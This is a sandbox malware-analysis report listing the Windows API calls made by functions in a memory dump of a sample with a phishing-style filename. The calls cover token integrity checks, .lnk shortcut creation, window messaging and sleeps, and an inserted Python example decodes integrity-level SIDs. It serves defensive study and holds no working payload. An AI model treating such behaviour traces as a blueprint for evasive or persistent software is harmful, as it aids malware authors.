                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Message$PeekTranslate$AcceleratorDispatch
                                          • String ID:
                                          • API String ID: 2108273632-0
                                          • Opcode ID: e8f29860b06a4e873dac7585363b953b45c637c911170219bb4d2b765a239ab5
                                          • Instruction ID: e67652b97691888d45783b4060a92794e4e4837a438627cf9828edff44ee2bac
                                          • Opcode Fuzzy Hash: e8f29860b06a4e873dac7585363b953b45c637c911170219bb4d2b765a239ab5
                                          • Instruction Fuzzy Hash: B031E571900646AFDB24CFB6EC44BF77BACBB42308F105265E525F21A0D7749889D7A2
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 00E48F12
                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00E48FBC
                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00E48FC4
                                          • PostMessageW.USER32(?,00000202,00000000), ref: 00E48FD2
                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00E48FDA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessagePostSleep$RectWindow
                                          • String ID:
                                          • API String ID: 3382505437-0
                                          • Opcode ID: cb459971ebcb7cf0bd61994c23f5e4ecec04fd290859cedf36b51350d8e818f0
                                          • Instruction ID: 9cf1a376e0db11db0aec972c1b351a86fc4dbdcae0126a3a885d20fe13ff5475
                                          • Opcode Fuzzy Hash: cb459971ebcb7cf0bd61994c23f5e4ecec04fd290859cedf36b51350d8e818f0
                                          • Instruction Fuzzy Hash: 1A31C07160021DEFDB14CFA8EA4CA9E7BB6EB04325F104229F925E61D1C7B09958DB91
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 00E4B6C7
                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E4B6E4
                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E4B71C
                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E4B742
                                          • _wcsstr.LIBCMT ref: 00E4B74C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                          • String ID:
                                          • API String ID: 3902887630-0
                                          • Opcode ID: ac7bd1de5972f2a528eed902406925616407427db908dc20e6f57528652d985d
                                          • Instruction ID: 87621064bd83b9130c6fc733514ec77057091bce4cb5fea1b4f0ef6894d8d6be
                                          • Opcode Fuzzy Hash: ac7bd1de5972f2a528eed902406925616407427db908dc20e6f57528652d985d
                                          • Instruction Fuzzy Hash: E521FC31604204BBEB159B79AC49EBB7B9CDF89760F00517AFD09EA161EF61DC8096A0
                                          APIs
                                            • Part of subcall function 00DF2612: GetWindowLongW.USER32(?,000000EB), ref: 00DF2623
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E7B44C
                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00E7B471
                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E7B489
                                          • GetSystemMetrics.USER32(00000004), ref: 00E7B4B2
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00E61184,00000000), ref: 00E7B4D0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$Long$MetricsSystem
                                          • String ID:
                                          • API String ID: 2294984445-0
                                          • Opcode ID: 428497639dc46d312cf6620b4d89f0a375f0ac7882c453bfe299c657fe346d13
                                          • Instruction ID: f57abab2b36976b4c8b1331356b0aff7946f36659a2d72d1d073a2d5209b8cf2
                                          • Opcode Fuzzy Hash: 428497639dc46d312cf6620b4d89f0a375f0ac7882c453bfe299c657fe346d13
                                          • Instruction Fuzzy Hash: 0D217C31910265AFCB248F39CC04BAA3BA4FB05725F149738F93AE31E1F73098509B90
                                          APIs
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E49802
                                            • Part of subcall function 00DF7D2C: _memmove.LIBCMT ref: 00DF7D66
                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E49834
                                          • __itow.LIBCMT ref: 00E4984C
                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E49874
                                          • __itow.LIBCMT ref: 00E49885
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageSend$__itow$_memmove
                                          • String ID:
                                          • API String ID: 2983881199-0
                                          • Opcode ID: 8f094a00ba2a53c6eb6c1853d14ab6641f2aaa50f6599a29c0c5c21dac5d9531
                                          • Instruction ID: 51d04dcec39833739141f7fc4d9cd850ea7cc5db1378e08a711cfeadb5e5f718
                                          • Opcode Fuzzy Hash: 8f094a00ba2a53c6eb6c1853d14ab6641f2aaa50f6599a29c0c5c21dac5d9531
                                          • Instruction Fuzzy Hash: 8221CB31700208ABDB149A759C86EEF7BA8EF4E714F045025FE05FB252D6708D4597E1
                                          APIs
                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00DF134D
                                          • SelectObject.GDI32(?,00000000), ref: 00DF135C
                                          • BeginPath.GDI32(?), ref: 00DF1373
                                          • SelectObject.GDI32(?,00000000), ref: 00DF139C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ObjectSelect$BeginCreatePath
                                          • String ID:
                                          • API String ID: 3225163088-0
                                          • Opcode ID: f7fa7d4f0dac382b73ff39caa1fbd6bea1dc1ae9913a15a836e94054e44cb777
                                          • Instruction ID: 782dfd72cdf121728e916aebe7cc64e0526e0445255b22e2b4570bea2815fa53
                                          • Opcode Fuzzy Hash: f7fa7d4f0dac382b73ff39caa1fbd6bea1dc1ae9913a15a836e94054e44cb777
                                          • Instruction Fuzzy Hash: F9217175800208EFDB159F66EC0577A7BF8FB00321F15C32AF918BA5A0D3759999DBA0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memcmp
                                          • String ID:
                                          • API String ID: 2931989736-0
                                          • Opcode ID: e9d35c1a8c6d1b9336456ce3d2bdfdc9304ac7936c6333f25fe87945141b2386
                                          • Instruction ID: 6e471e6511c3ea2b0169c6852250b232583d2f7866c3b42452fb6063d219a4ad
                                          • Opcode Fuzzy Hash: e9d35c1a8c6d1b9336456ce3d2bdfdc9304ac7936c6333f25fe87945141b2386
                                          • Instruction Fuzzy Hash: 9B0192B1A072057BE204B6206C42FFB67AC9B21398F646065FE08B7383E651AE1182A0
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00E54D5C
                                          • __beginthreadex.LIBCMT ref: 00E54D7A
                                          • MessageBoxW.USER32(?,?,?,?), ref: 00E54D8F
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E54DA5
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E54DAC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                          • String ID:
                                          • API String ID: 3824534824-0
                                          • Opcode ID: 7afc22e6859de841a9eb8d82a5674ec0cb1f0c51702f4239278ae70926b92457
                                          • Instruction ID: 13e1a5d78fdb88935fa70c55bd73e6a948588a10b06ffa8fabda53e4de329d62
                                          • Opcode Fuzzy Hash: 7afc22e6859de841a9eb8d82a5674ec0cb1f0c51702f4239278ae70926b92457
                                          • Instruction Fuzzy Hash: A81108B6904204BFD701DBA99C04ADB7FBCEB45325F144365FD18F32A1D6758D888BA0
                                          APIs
                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E48766
                                          • GetLastError.KERNEL32(?,00E4822A,?,?,?), ref: 00E48770
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00E4822A,?,?,?), ref: 00E4877F
                                          • HeapAlloc.KERNEL32(00000000,?,00E4822A,?,?,?), ref: 00E48786
                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E4879D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 842720411-0
                                          • Opcode ID: 228453688b3a1b39268850aab43e07f7e13effb11505f614a7e1a5cc855128fe
                                          • Instruction ID: fdd178b1d10025a3b262bb2a4b6ff4c69a80bde23623734989a347354e404961
                                          • Opcode Fuzzy Hash: 228453688b3a1b39268850aab43e07f7e13effb11505f614a7e1a5cc855128fe
                                          • Instruction Fuzzy Hash: 15016271605204FFDB108FA6ED4CD6B7B6CFF85355B200439F849E2160DA318C44CA70
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E55502
                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E55510
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E55518
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E55522
                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E5555E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                          • String ID:
                                          • API String ID: 2833360925-0
                                          • Opcode ID: 2d4ec9626897b1121ab21856115a5dddbadc2af4e591dc849022b06e98e37715
                                          • Instruction ID: a3b5bd5cfd1b295087d29dff22719aff81a79cb059f04b4d37fb302a683d15de
                                          • Opcode Fuzzy Hash: 2d4ec9626897b1121ab21856115a5dddbadc2af4e591dc849022b06e98e37715
                                          • Instruction Fuzzy Hash: 50016D32C01A29DBCF00DFE9E8589EDBB79FF09712F400856E805B2141EB305598C7A1
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E48608
                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E48612
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E48621
                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E48628
                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E4863E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          • Opcode ID: 7c450b82d2ac61d44a5146c4dafa74afca696b3d2713e94944a0e9b67c945d20
                                          • Instruction ID: 7b2014225e0a25635cf2b8a17e5e35a6b4f8adb3fe032ad51dac63757ac3afa5
                                          • Opcode Fuzzy Hash: 7c450b82d2ac61d44a5146c4dafa74afca696b3d2713e94944a0e9b67c945d20
                                          • Instruction Fuzzy Hash: 5DF04F31201204AFEB104FA6ED89E6F3BACFF89B58F401465F949E6150CB61DC85DA60
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E48669
                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E48673
                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E48682
                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E48689
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E4869F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          • Opcode ID: 612ae972330f256a09be995423ae3f81612bd5c468215a415b43ae4fc9151836
                                          • Instruction ID: bb8c33f54bfea5e818747795142d11e887b0be347ab46d8e6fce74fd5c595718
                                          • Opcode Fuzzy Hash: 612ae972330f256a09be995423ae3f81612bd5c468215a415b43ae4fc9151836
                                          • Instruction Fuzzy Hash: DBF04F71201204AFEB115FA6EC88E6B3BACFF8A758F100075F949E6150CA61D985DA60
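The record above ends with a GetTokenInformation call whose arguments carry TokenIntegrityLevel, i.e. the function reads the process token's mandatory label. What comes back is a TOKEN_MANDATORY_LABEL whose SID is S-1-16-RID, and the RID, not the SID string, is what the caller compares. The Python below is an added example, not code from the Joe Sandbox report or from the analysed sample: it decodes such a label SID from its binary layout, names the well-known levels, and applies the usual "High or above" elevation test. The two sample labels are constructed, and the function and constant names are my own.

```python
import struct

# Well-known mandatory-label RIDs (SECURITY_MANDATORY_*_RID in winnt.h).
INTEGRITY_LEVELS = {
    0x0000: "Untrusted",
    0x1000: "Low",
    0x2000: "Medium",
    0x2100: "Medium Plus",
    0x3000: "High",
    0x4000: "System",
    0x5000: "Protected Process",
}
MANDATORY_LABEL_AUTHORITY = 16  # the S-1-16-* identifier authority


def parse_sid(blob: bytes) -> tuple:
    """Decode a binary SID into (revision, identifier_authority, [sub_authorities]).
    Layout: u8 revision, u8 sub-authority count, 48-bit big-endian authority,
    then `count` little-endian DWORDs. Lengths are checked before unpacking."""
    if len(blob) < 8:
        raise ValueError("SID shorter than its 8-byte header")
    revision, count = blob[0], blob[1]
    if revision != 1:
        raise ValueError("unsupported SID revision %d" % revision)
    authority = int.from_bytes(blob[2:8], "big")
    if len(blob) < 8 + 4 * count:
        raise ValueError("SID declares %d sub-authorities, buffer too short" % count)
    subs = list(struct.unpack_from("<%dI" % count, blob, 8))
    return revision, authority, subs


def sid_to_string(blob: bytes) -> str:
    revision, authority, subs = parse_sid(blob)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def integrity_level(label_sid: bytes) -> tuple:
    """Interpret TOKEN_MANDATORY_LABEL.Label.Sid. The last sub-authority is the
    integrity RID; Windows compares RIDs numerically, so a non-standard value is
    reported relative to the nearest well-known level below it."""
    _, authority, subs = parse_sid(label_sid)
    if authority != MANDATORY_LABEL_AUTHORITY or not subs:
        raise ValueError("not a mandatory-label (S-1-16-*) SID")
    rid = subs[-1]
    name = INTEGRITY_LEVELS.get(rid)
    if name is None:
        base = max(k for k in INTEGRITY_LEVELS if k <= rid)
        name = INTEGRITY_LEVELS[base] + " (non-standard RID)"
    return rid, name


def is_high_or_above(label_sid: bytes) -> bool:
    """The usual 'am I elevated?' test derived from the label: High (0x3000) or higher."""
    rid, _ = integrity_level(label_sid)
    return rid >= 0x3000


# Constructed sample labels, laid out as GetTokenInformation(TokenIntegrityLevel)
# returns them (SID part only): S-1-16-8192 (Medium) and S-1-16-12288 (High).
MEDIUM_LABEL = bytes([1, 1, 0, 0, 0, 0, 0, 16]) + struct.pack("<I", 0x2000)
HIGH_LABEL = bytes([1, 1, 0, 0, 0, 0, 0, 16]) + struct.pack("<I", 0x3000)

if __name__ == "__main__":
    for label in (MEDIUM_LABEL, HIGH_LABEL):
        print(sid_to_string(label), integrity_level(label), is_high_or_above(label))
```

When reproducing this on a live process, only the SID pointed to by Label.Sid is passed in; the SID_AND_ATTRIBUTES header that precedes it in the GetTokenInformation buffer is not part of the SID.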
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 00E4C6BA
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E4C6D1
                                          • MessageBeep.USER32(00000000), ref: 00E4C6E9
                                          • KillTimer.USER32(?,0000040A), ref: 00E4C705
                                          • EndDialog.USER32(?,00000001), ref: 00E4C71F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                          • String ID:
                                          • API String ID: 3741023627-0
                                          • Opcode ID: 43bfb8244fd1232b6ce932f529dee46501b30e338b6948dfa67a3db8ed5b8e92
                                          • Instruction ID: 1d65fdd916a0aae92951a8bd871ddaa91e680bfa6af51eac2324d3f14ae11dc1
                                          • Opcode Fuzzy Hash: 43bfb8244fd1232b6ce932f529dee46501b30e338b6948dfa67a3db8ed5b8e92
                                          • Instruction Fuzzy Hash: 9F01D630400304ABEB209F61EC4EFA677B8FF04B05F10166AF546B20E0DBF0A9988F90
                                          APIs
                                          • EndPath.GDI32(?), ref: 00DF13BF
                                          • StrokeAndFillPath.GDI32(?,?,00E2BAD8,00000000,?), ref: 00DF13DB
                                          • SelectObject.GDI32(?,00000000), ref: 00DF13EE
                                          • DeleteObject.GDI32 ref: 00DF1401
                                          • StrokePath.GDI32(?), ref: 00DF141C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                          • String ID:
                                          • API String ID: 2625713937-0
                                          • Opcode ID: 5335f806b4642e7067a693ce56d16885addeaf3c14e08603df3975c884e56ab9
                                          • Instruction ID: f3118281d08135398c7378ef4340fe0188d9bb1ff5f7e56b51ea5e06756b1e9f
                                          • Opcode Fuzzy Hash: 5335f806b4642e7067a693ce56d16885addeaf3c14e08603df3975c884e56ab9
                                          • Instruction Fuzzy Hash: 5CF0B235004208EFDB1A9FA7EC087693BA5AB41326F08C324E569A91B1C7398999DF60
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 00E5C69D
                                          • CoCreateInstance.OLE32(00E82D6C,00000000,00000001,00E82BDC,?), ref: 00E5C6B5
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                          • CoUninitialize.OLE32 ref: 00E5C922
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                          • String ID: .lnk
                                          • API String ID: 2683427295-24824748
                                          • Opcode ID: b27b2731188805f28b977c76f715c71e866b107ee3f078722d3b2668d9b0aa29
                                          • Instruction ID: 0cde4da9f395eaa5e35847cb980676bb3dac271598554cf522711bb9081a9643
                                          • Opcode Fuzzy Hash: b27b2731188805f28b977c76f715c71e866b107ee3f078722d3b2668d9b0aa29
                                          • Instruction Fuzzy Hash: EAA13B71508305AFD300EF54C891EABB7E8EF94704F00891CF696971A2DB70EA49CB72
                                          APIs
                                            • Part of subcall function 00E10FF6: std::exception::exception.LIBCMT ref: 00E1102C
                                            • Part of subcall function 00E10FF6: __CxxThrowException@8.LIBCMT ref: 00E11041
